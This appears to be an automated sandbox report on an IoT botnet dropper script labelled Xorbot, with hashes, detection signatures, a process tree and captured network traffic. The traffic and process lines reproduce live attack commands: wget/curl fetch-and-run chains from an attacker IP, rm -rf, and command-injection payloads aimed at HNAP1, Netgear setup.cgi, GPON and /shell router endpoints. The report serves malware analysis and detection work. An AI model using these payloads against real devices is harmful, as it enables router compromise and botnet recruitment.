Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
-
submitted
04/01/2025, 20:07 UTC
General
-
Target
bins.sh
-
Size
10KB
-
MD5
24b2ac3e59f5d959842fd55121d3bdc9
-
SHA1
763ee9168932808f0f910a07eaec0cb840d640ad
-
SHA256
1cfa441a888b8dcf421d19f836edc247355421e42d6f4e9adb579e3e55b2ff1e
-
SHA512
f2945688e2a6c87ff40fb8dcdcf65ff6ed7b890107905f4c50fbe4c37962d2b8a4cd01f0912bc280e6ec54aa2375258344c2b6c959845d070e80d90c741903e0
-
SSDEEP
96:PC2UJJSHA2U0Wxt3tr3f8czKoMEn3nXqC2UJJxmLAnqU0Wxt6Lkr3f8c9gOrB2X9:NHDU0Wxt3hKoMEn3nwU0WxtwoMEn3I
Score
10/10
Malware Config
Signatures
-
Detects Xorbot 2 IoCs
-
Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
-
Xorbot family
-
Contacts a large (1283) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 3 IoCs
-
Renames itself 1 IoCs
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h2⤵
- File and Directory Permissions Modification
-
-
/tmp/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h./3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h2⤵
- Executes dropped EXE
-
-
/bin/rmrm 3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h2⤵
-
-
/usr/bin/wgetwget http://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW2⤵
- File and Directory Permissions Modification
-
-
/tmp/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW./uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW2⤵
- Executes dropped EXE
-
-
/bin/rmrm uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW2⤵
-
-
/usr/bin/wgetwget http://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc2⤵
- File and Directory Permissions Modification
-
-
/tmp/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc./4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
-
/bin/shsh -c "crontab -l"3⤵
-
/usr/bin/crontabcrontab -l4⤵
-
-
-
/bin/shsh -c "crontab -"3⤵
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
-
-
-
-
/bin/rmrm 4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc2⤵
-
-
/usr/bin/wgetwget http://66.63.187.225/bins/TWi73DcRNjcub8IGqwC3UZ8QzfTlbmYzVq2⤵
-
-
/usr/bin/curlcurl -O http://66.63.187.225/bins/TWi73DcRNjcub8IGqwC3UZ8QzfTlbmYzVq2⤵
-
Network
-
GEThttp://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9hRemote address:66.63.187.225:80RequestGET /bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 66.63.187.225
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:07:07 GMT
Content-Type: application/octet-stream
Content-Length: 101142
Connection: keep-alive
Last-Modified: Sat, 04 Jan 2025 20:00:02 GMT
ETag: "67799342-18b16"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
GEThttp://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9hRemote address:66.63.187.225:80RequestGET /bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h HTTP/1.1
Host: 66.63.187.225
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:07:10 GMT
Content-Type: application/octet-stream
Content-Length: 101142
Connection: keep-alive
Last-Modified: Sat, 04 Jan 2025 20:00:02 GMT
ETag: "67799342-18b16"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
GEThttp://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9hRemote address:66.63.187.225:80RequestGET /bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h HTTP/1.1
Host: 66.63.187.225
User-Agent: Wget
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:07:12 GMT
Content-Type: application/octet-stream
Content-Length: 101142
Connection: close
Last-Modified: Sat, 04 Jan 2025 20:00:02 GMT
ETag: "67799342-18b16"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
GEThttp://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlWRemote address:66.63.187.225:80RequestGET /bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 66.63.187.225
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:07:13 GMT
Content-Type: application/octet-stream
Content-Length: 122566
Connection: keep-alive
Last-Modified: Sat, 04 Jan 2025 20:00:02 GMT
ETag: "67799342-1dec6"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
GEThttp://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlWRemote address:66.63.187.225:80RequestGET /bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW HTTP/1.1
Host: 66.63.187.225
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:07:15 GMT
Content-Type: application/octet-stream
Content-Length: 122566
Connection: keep-alive
Last-Modified: Sat, 04 Jan 2025 20:00:02 GMT
ETag: "67799342-1dec6"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
GEThttp://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlWRemote address:66.63.187.225:80RequestGET /bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlW HTTP/1.1
Host: 66.63.187.225
User-Agent: Wget
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:07:17 GMT
Content-Type: application/octet-stream
Content-Length: 122566
Connection: close
Last-Modified: Sat, 04 Jan 2025 20:00:02 GMT
ETag: "67799342-1dec6"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
GEThttp://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUocRemote address:66.63.187.225:80RequestGET /bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 66.63.187.225
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:07:18 GMT
Content-Type: application/octet-stream
Content-Length: 155208
Connection: keep-alive
Last-Modified: Sat, 04 Jan 2025 20:00:03 GMT
ETag: "67799343-25e48"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
GEThttp://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUocRemote address:66.63.187.225:80RequestGET /bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc HTTP/1.1
Host: 66.63.187.225
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:07:20 GMT
Content-Type: application/octet-stream
Content-Length: 155208
Connection: keep-alive
Last-Modified: Sat, 04 Jan 2025 20:00:03 GMT
ETag: "67799343-25e48"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
GEThttp://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUocRemote address:66.63.187.225:80RequestGET /bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUoc HTTP/1.1
Host: 66.63.187.225
User-Agent: Wget
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:07:21 GMT
Content-Type: application/octet-stream
Content-Length: 155208
Connection: close
Last-Modified: Sat, 04 Jan 2025 20:00:03 GMT
ETag: "67799343-25e48"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN A
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A66.63.187.225conn.masjesu.zipIN A146.19.162.73
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN A
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A146.19.162.73conn.masjesu.zipIN A66.63.187.225
-
GEThttp://66.63.187.225/.shellRemote address:66.63.187.225:80RequestGET /.shell HTTP/1.1
Host: 66.63.187.225
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 04 Jan 2025 20:08:13 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 211
Connection: close
server-timing: cfL4;desc="?proto=TCP&rtt=48016&min_rtt=47713&rtt_var=18499&sent=3&recv=6&lost=0&retrans=0&sent_bytes=139&recv_bytes=571&delivery_rate=28399&cwnd=94&unsent_bytes=0&cid=c9b326e450075fb6&ts=75&x=0"
-
GEThttp://190.123.24.93:80/shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 190.123.24.93:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 20:08:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/8.2.21
-
POSThttp://190.123.24.93:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 190.123.24.93:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://66.63.187.225/bins.sh;curl -O http://66.63.187.225/bins.sh;/bin/busybox wget http://66.63.187.225/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
-
GEThttp://190.123.24.93:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 20:08:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/8.2.21
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Jan 2025 20:08:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/8.2.21
Content-Encoding: gzip
-
DNSResponseHTTP/1.1 400 Bad Request
Server: nginx
Date: Sat, 04 Jan 2025 20:08:47 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
-
POSThttp://94.123.90.91:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 94.123.90.91:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://66.63.187.225/bins.sh;curl -O http://66.63.187.225/bins.sh;/bin/busybox wget http://66.63.187.225/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
-
GEThttp://94.123.90.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 94.123.90.91:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
GEThttp://94.123.90.91:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
-
GEThttp://94.123.90.91:81/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://66.63.187.225/l7vmra;sh${IFS}/tmp/l7vmra&>r&&tar${IFS}/string.jsRequestGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://66.63.187.225/l7vmra;sh${IFS}/tmp/l7vmra&>r&&tar${IFS}/string.js HTTP/1.0
-
GEThttp://94.123.90.91:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
-
POSThttp://127.0.0.1:8080/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
-
POSThttp://127.0.0.1:5555/UD/act?1RequestPOST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:5555
User-Agent: masjesu
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
-
GEThttp://23.208.242.94:80/shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 23.208.242.94:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 312
Expires: Sat, 04 Jan 2025 20:08:53 GMT
Date: Sat, 04 Jan 2025 20:08:53 GMT
Connection: close
-
POSThttp://23.208.242.94:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 23.208.242.94:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://66.63.187.225/bins.sh;curl -O http://66.63.187.225/bins.sh;/bin/busybox wget http://66.63.187.225/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 353
Expires: Sat, 04 Jan 2025 20:08:54 GMT
Date: Sat, 04 Jan 2025 20:08:54 GMT
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 302 Found
Location: https://127.0.0.1/GponForm/diag_Form?images/
Content-Length: 0
Connection: close
Date: Sat, 04 Jan 2025 20:08:57 GMT
Server: lighttpd/1.4.54
-
GEThttp://102.23.244.36:80/shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 102.23.244.36:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 302 Found
Location: https://102.23.244.36/shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
Content-Length: 0
Connection: close
Date: Sat, 04 Jan 2025 20:08:59 GMT
Server: lighttpd/1.4.54
-
POSThttp://102.23.244.36:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 102.23.244.36:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://66.63.187.225/bins.sh;curl -O http://66.63.187.225/bins.sh;/bin/busybox wget http://66.63.187.225/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 302 Found
Location: https://102.23.244.36/HNAP1/
Content-Length: 0
Connection: close
Date: Sat, 04 Jan 2025 20:08:57 GMT
Server: lighttpd/1.4.54
-
GEThttp://102.23.244.36:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.0 302 Found
Location: https:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
Content-Length: 0
Connection: close
Date: Sat, 04 Jan 2025 20:08:59 GMT
Server: lighttpd/1.4.54
-
POSThttp://188.149.117.241:49152/soap.cgi?service=WANIPConn1RequestPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
Host: 188.149.117.241:49152
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: masjesu
Connection: keep-alive
-
undefinedRequestExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
-
GEThttp://18.233.127.110:80/shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 18.233.127.110:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 404 Not Found
Server: awselb/2.0
Date: Sat, 04 Jan 2025 20:09:21 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 22
Connection: keep-alive
-
POSThttp://18.233.127.110:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 18.233.127.110:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://66.63.187.225/bins.sh;curl -O http://66.63.187.225/bins.sh;/bin/busybox wget http://66.63.187.225/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.1 404 Not Found
Server: awselb/2.0
Date: Sat, 04 Jan 2025 20:09:23 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 22
Connection: close
-
GEThttp://18.233.127.110:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.1 404 Not Found
Server: awselb/2.0
Date: Sat, 04 Jan 2025 20:09:22 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 22
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 404 Not Found
Server: awselb/2.0
Date: Sat, 04 Jan 2025 20:09:22 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 22
Connection: keep-alive
-
DNSResponseHTTP/1.1 400 Bad Request
Server: awselb/2.0
Date: Sat, 04 Jan 2025 20:09:22 GMT
Content-Type: text/html
Content-Length: 122
Connection: close
-
GEThttp://37.123.148.59:80/shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 37.123.148.59:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Sat, 04 Jan 2025 20:09:27 GMT
Content-Length: 1229
-
POSThttp://37.123.148.59:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 37.123.148.59:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://66.63.187.225/bins.sh;curl -O http://66.63.187.225/bins.sh;/bin/busybox wget http://66.63.187.225/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 04 Jan 2025 20:09:31 GMT
Connection: close
Content-Length: 311
-
GEThttp://37.123.148.59:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Sat, 04 Jan 2025 20:09:26 GMT
Connection: close
Content-Length: 1229
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Sat, 04 Jan 2025 20:09:26 GMT
Content-Length: 1229
-
DNSResponseHTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 04 Jan 2025 20:09:26 GMT
Connection: close
Content-Length: 326
-
GEThttp://23.196.145.239:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 312
Expires: Sat, 04 Jan 2025 20:09:35 GMT
Date: Sat, 04 Jan 2025 20:09:35 GMT
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 312
Expires: Sat, 04 Jan 2025 20:09:35 GMT
Date: Sat, 04 Jan 2025 20:09:35 GMT
Connection: close
-
GEThttp://23.196.145.239:80/shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 23.196.145.239:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 312
Expires: Sat, 04 Jan 2025 20:09:35 GMT
Date: Sat, 04 Jan 2025 20:09:35 GMT
Connection: close
-
POSThttp://23.196.145.239:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 23.196.145.239:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://66.63.187.225/bins.sh;curl -O http://66.63.187.225/bins.sh;/bin/busybox wget http://66.63.187.225/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 353
Expires: Sat, 04 Jan 2025 20:09:35 GMT
